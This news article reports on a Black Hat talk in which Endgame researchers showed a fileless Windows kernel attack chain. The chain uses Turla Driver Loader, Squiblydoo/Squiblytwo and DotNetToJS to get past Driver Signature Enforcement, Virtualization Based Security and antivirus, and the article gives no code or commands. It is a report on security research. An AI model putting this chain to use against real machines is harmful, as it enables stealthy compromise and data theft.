Researchers have demonstrated a new attack method able to compromise the kernel in Windows machines.
On Thursday at the Black Hat conference in Las Vegas, researchers from cybersecurity firm Endgame demonstrated how kernel attacks can go beyond standard malware and exploits to fully compromise a Windows machine with a fileless technique.
As reported by Threat Post, during the session “Kernel Mode Threats and Practical Defenses,” senior Endgame researcher Joe Desimone demonstrated how the Turla Driver Loader could be crafted into a full, fileless kernel-mode attack.
The Turla Driver Loader (TDL), available on GitHub, is a driver loader designed to bypass Windows x64 Driver Signature Enforcement protections.
While the security measure is intended to prevent drivers loading without digital signing, according to the developers of TDL, this “ruined many freeware programs” and “didn’t fix anything in the anti-malware field,” leading to the development of the bypass.
The component of PC operating systems called the kernel is a critical aspect of today’s machines. The kernel is the central module of an OS and once loaded it stays in memory in order to manage aspects of processes and tasks.
If a threat actor manages to gain access to the kernel they can poke around the critical elements of an OS and perform actions which otherwise would be forbidden.
As a result PC vendors, including Microsoft, spend a vast amount of resources in order to protect the kernel.
The Redmond giant has a number of protections in place, such as Kernel Patch Protection (KPP) which prevents the kernel from being patched, Driver Signature Enforcement — which only allows drivers to be loaded which have been signed off by Microsoft — and Secure Boot, which is meant to stop software other than that provided by the Original Equipment Manufacturer (OEM) from booting.
However, cyberattackers are constantly seeking new ways to compromise the kernel through malware and new attack techniques.
TDL was not crafted as a tool for threat actors, and yet, the public code can be used for a full compromise of Windows systems and the exfiltration of data.
Endgame researchers demonstrated how TDL can be used as part of an exploit chain. Hacking tools Squiblydoo/Squiblytwo and DotNetToJS can be used to execute arbitrary .NET code which maps TDL into memory without touching the disk and setting off Windows protections or antivirus software.
Once loaded into memory, TDL can exploit a signed driver and push malicious code into the kernel.
The researchers say they do not know of any other teams which have created the same exploit chain for kernel compromise.
Speaking to Threat Post Gabriel Landau Endgame researcher said:“We’re able to get full access on the machines in a very stealthy way.”
In response to such attacks, Microsoft recently launched Virtualization Based Security (VBS) which sandboxes the kernel. However, even this protection isn’t enough as Endgame was also able to circumvent VBS to silently disable antivirus solutions.